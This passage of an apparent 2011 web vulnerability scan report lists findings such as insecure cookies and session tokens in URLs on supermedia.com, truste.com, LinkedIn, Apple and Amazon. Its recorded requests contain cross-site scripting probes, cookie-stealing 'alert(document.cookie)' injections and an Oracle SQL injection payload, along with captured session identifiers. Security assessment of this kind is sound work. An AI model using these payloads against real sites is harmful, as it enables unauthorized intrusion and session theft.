GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00029D)%3C%2Fscript%3E HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; CstrStatus=U; campaign_track=BP%3AUpdate%20Your%20Profile%20Top

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Fri, 04 Feb 2011 01:45:19 GMT
Set-Cookie: JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; Path=/; Secure
Set-Cookie: CstrStatus=RVU; Expires=Sun, 06-Mar-2011 01:45:19 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Location: https://www.supermedia.com/spportal/myaccount.do;jsessionid=CD1B75B428F192D4B130C351A3081BAE.app2-a1
Content-Language: en-US
Content-Length: 0
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b;path=/


8.14. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: trafficSource=default; CstrStatus=U; JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b; s_cc=true; s_sq=%5B%5BB%5D%5D
Host: www.supermedia.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 01:49:34 GMT
Set-Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Sun, 06-Mar-2011 01:49:34 GMT; Path=/
Set-Cookie: CstrStatus=RVU; Expires=Sun, 06-Mar-2011 01:49:34 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 19973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...

8.15. https://www.thumbshots.com/Products/ThumbshotsImages/IntegrationCode.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thumbshots.com
Path:   /Products/ThumbshotsImages/IntegrationCode.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Products/ThumbshotsImages/IntegrationCode.aspx HTTP/1.1
Host: www.thumbshots.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35926
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

9. Session token in URL  previous  next
There are 12 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://clicktoverify.truste.com/images/watch_btn3.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /images/watch_btn3.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/watch_btn3.png?PHPSESSID=32ccfa3696aaccd36928dc1a7066c7ce HTTP/1.1
Accept: */*
Referer: http://clicktoverify.truste.com/pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: clicktoverify.truste.com
Cookie: __utma=165058976.885858271.1296786644.1296786644.1296786644.1; __utmb=165058976.1.10.1296786644; __utmc=165058976; __utmz=165058976.1296786644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/28

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:29:51 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
Last-Modified: Thu, 25 Mar 2010 22:46:27 GMT
ETag: "81ce11-570-d12736c0"
Accept-Ranges: bytes
Content-Length: 1392
Content-Type: image/png

.PNG
.
...IHDR..............9'.....tEXtSoftware.Adobe ImageReadyq.e<....PLTETRP..b..:..R.....L...{.3........A..i..W........I........a..Y..^..z..W.....u..?.....6.._.....G..q.....?..S.....k..c..C.....
...[SNIP]...

9.2. http://clicktoverify.truste.com/pvr.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101 HTTP/1.1
Host: clicktoverify.truste.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:47:38 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta n
...[SNIP]...
<div id="logo"><a
   href="//privacy-policy.truste.com/click-with-confidence/ctv/en/truste.com?PHPSESSID=3599fb7ea791916a827c0d96401f1083"
   target="_blank">
<img style="border: none"
   src="//privacy-policy.truste.com/certified-seal/ctv/en/truste.com/seal.png" />
...[SNIP]...

9.3. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /webservices/v1/LoggingService/LoggingService.svc/Log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webservices/v1/LoggingService/LoggingService.svc/Log?entry=1&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3.20091207154938.04&session=1296733441488&mkt=en-us&auth=p3QTbbHsCs-eeUFhvWJsTUVffL_Ir8TWNCsd-WpPTj7F6jKZTdTbkF_H-pfUpTkqszv1R7ui7FAHG-ONafiS_w2&image=1& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7%22-alert(document.cookie)-%22e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Cache-Control: no-cache
Server: Microsoft-IIS/7.5
X-BM-Srv: BL2M001304
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 22:01:52 GMT


9.4. http://my.supermedia.com/directoryoptout/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://my.supermedia.com
Path:   /directoryoptout/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /directoryoptout/;jsessionid=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059 HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://my.supermedia.com/directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:45:54 GMT
Pragma: no-cache
ntCoent-Length: 24459
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:53:30 GMT;path=/;httponly
Content-Length: 24459


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...

9.5. http://qa.linkedin.com/pub/smart-devil/19/697/322/x22  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://qa.linkedin.com
Path:   /pub/smart-devil/19/697/322/x22

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /pub/smart-devil/19/697/322/x22 HTTP/1.1
Host: qa.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/
Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT
If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:33:42 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<li id="send-inmail">
<a href="http://www.linkedin.com/ppl/webprofile?action=ctu&amp;id=64397834&amp;pvs=pp&amp;authToken=eS12&amp;authType=name&amp;trk=ppro_cntdir&amp;lnk=cnt_dir" rel="nofollow">Contact Smart Devil</a>
...[SNIP]...
<li id="add-to-network">
<a href="http://www.linkedin.com/ppl/webprofile?action=ctu&amp;id=64397834&amp;pvs=pp&amp;authToken=eS12&amp;authType=name&amp;trk=ppro_getintr&amp;lnk=cnt_dir" rel="nofollow">Add Smart Devil to your network</a>
...[SNIP]...
<p><a href="http://www.linkedin.com/ppl/webprofile?vmi=&id=64397834&pvs=pp&authToken=eS12&authType=name&locale=en_US&trk=ppro_viewmore&lnk=vw_pprofile" class="action" rel="nofollow"><span>
...[SNIP]...
<strong>
<a href="http://www.linkedin.com/ppl/webprofile?gwp=&id=64397834&pvs=pp&authToken=eS12&authType=name&locale=en_US&trk=ppro_geturl&lnk=sign_in" rel="nofollow">Sign In</a>
...[SNIP]...
<strong>
<a href="http://www.linkedin.com/ppl/webprofile?gwp=&id=64397834&pvs=pp&authToken=eS12&authType=name&locale=en_US&trk=ppro_joinnow&lnk=join_now" rel="nofollow">Join Now</a>
...[SNIP]...
<p class="btn">
<a href="http://www.linkedin.com/ppl/webprofile?vmi=&id=64397834&pvs=pp&authToken=eS12&authType=name&locale=en_US&trk=ppro_viewmore&lnk=vw_pprofile" class="action" rel="nofollow"><span>
...[SNIP]...

9.6. http://storechat.apple.com/hc/6964264/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://storechat.apple.com
Path:   /hc/6964264/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/6964264/?&site=6964264&cmd=mTagStartPage&lpCallId=434987039770-84541859571&protV=20&lpjson=1&page=http%3A//store.apple.com/us/browse/home/shop_ipod/family/ipod_classic%3Fmco%3DMTM3NTMxMzA&id=5000668719&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-us-consumer-sales-english&activePlugin=none&cobrowse=true&PV%21lpCountryCode=us&PV%21lpSegment=consumer&PV%21lpUnit=sales&PV%21lpPageName=AOS%3A%20home/shop_ipod/family/ipod_classic&PV%21lpSection=product%20selection&PV%21lpSubSection=ipod_classic&PV%21pageLoadTime=8%20sec&PV%21visitorActive=1&SV%21lpLanguage=english&SV%21lpPageNameSession=AOS%3A%20home/shop_ipod/family/ipod_classic&title=iPod%20classic%20-%20Apple%20Store%20%28U.S.%29&referrer=http%3A//store.apple.com/us&cobrowse=true HTTP/1.1
Host: storechat.apple.com
Proxy-Connection: keep-alive
Referer: http://store.apple.com/us/browse/home/shop_ipod/family/ipod_classic?mco=MTM3NTMxMzA
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5241864906341434075; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; s_cc=true; s_sq=appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; LivePersonID=LP i=4680124532241,d=1296755435; HumanClickACTIVE=1296755435605

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:50:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-4680124532241-1296755436:0; expires=Fri, 03-Feb-2012 17:50:36 GMT; path=/hc/6964264
Set-Cookie: HumanClickKEY=5241864906341434075; path=/hc/6964264
Set-Cookie: HumanClickSiteContainerID_6964264=STANDALONE; path=/hc/6964264
Set-Cookie: LivePersonID=-4680124532241-1296755436:-1:-1:-1:-1; expires=Fri, 03-Feb-2012 17:50:36 GMT; path=/hc/6964264
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 03 Feb 2011 17:50:36 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"434987039770-84541859571","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

9.7. http://www.amazon.com/SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1KMV2BXDN94S7KQ0JZ7S
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: q5mVjA3yFvZi2IuxLAukAm69vnbnuFICbsgIGuLZMtThRGfrgK3+KrMswERBq2Ak
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 350615


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_idp_LkYsnb1M2XN47?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002OG5QUC%2Fref%3Dcm_sw_r_fa_idp_LkYsnb1M2XN47%26bodytext%3DSmartDraw%25202010%2520by%2520SmartDraw.com" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_idp_LkYsnb1M2XN47?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002OG5QUC%2Fref%3Dcm_sw_r_fa_idp_LkYsnb1M2XN47%26bodytext%3DSmartDraw%25202010%2520by%2520SmartDraw.com', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_idp_LkYsnb1M2XN47?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002OG5QUC%252Fx22%252Fref%253Dcm_sw_r_tw_idp_LkYsnb1M2XN47%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSmartDraw%25202010%2520by%2520SmartDraw.com%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002OG5QUC%2Fref%3Dcm_sw_r_tw_idp_LkYsnb1M2XN47%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_idp_LkYsnb1M2XN47?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB002OG5QUC%252Fx22%252Fref%253Dcm_sw_r_tw_idp_LkYsnb1M2XN47%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSmartDraw%25202010%2520by%2520SmartDraw.com%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB002OG5QUC%2Fref%3Dcm_sw_r_tw_idp_LkYsnb1M2XN47%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RR0EXQZ9IJEVJ/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C86FE6845A4955D26CA1D1B68A13D2458A7693C5&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMk9HNVFVQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RR0EXQZ9IJEVJ.2115.Helpful.Reviews&voteSessionID=176-9787580-1042565"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RR0EXQZ9IJEVJ/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=EA1A642787D77976476DAA0DFB4997E2E90CFF0C&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMk9HNVFVQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RR0EXQZ9IJEVJ.2115.Helpful.Reviews&voteSessionID=176-9787580-1042565"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RR0EXQZ9IJEVJ/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=95CC0F3394E3322B4985BBEEDAD09FEC0C5DC45B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMk9HNVFVQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=RR0EXQZ9IJEVJ.2115.Inappropriate.Reviews&voteSessionID=176-9787580-1042565"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1SSB38WB8965J/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=D7932920F1A2F25C1C9469D2B227BCFB1B42AC99&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMk9HNVFVQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R1SSB38WB8965J.2115.Helpful.Reviews&voteSessionID=176-9787580-1042565"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1SSB38WB8965J/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=9E5A8068EE33AF52472403086A4DF1BD9562E13D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMk9HNVFVQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R1SSB38WB8965J.2115.Helpful.Reviews&voteSessionID=176-9787580-1042565"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1SSB38WB8965J/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=15C5A91F5B7A08D8D654BDB9FF01C4C330DCFBC1&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMk9HNVFVQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R1SSB38WB8965J.2115.Inappropriate.Reviews&voteSessionID=176-9787580-1042565"
>
Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1NVLCMGE9MX84/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=20F4AD365A5E67321D670C1BCDDEC67E8CFAEFA6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMk9HNVFVQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R1NVLCMGE9MX84.2115.Helpful.Reviews&voteSessionID=176-9787580-1042565"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1NVLCMGE9MX84/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=EFC3B09A52A89C95B31FE71AB56AC2C5D354DF49&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMk9HNVFVQy94MjIvcmVmPWNtX2NyX2Rwdm90ZXJkcj9pZT1VVEY4JmlzU1JBZG1pbj0&voteAnchorName=R1NVLCMGE9MX84.2115.Helpful.Reviews&voteSessionID=176-9787580-1042565"><span class="cmtySprite s_largeNo " >
...[SNIP]...
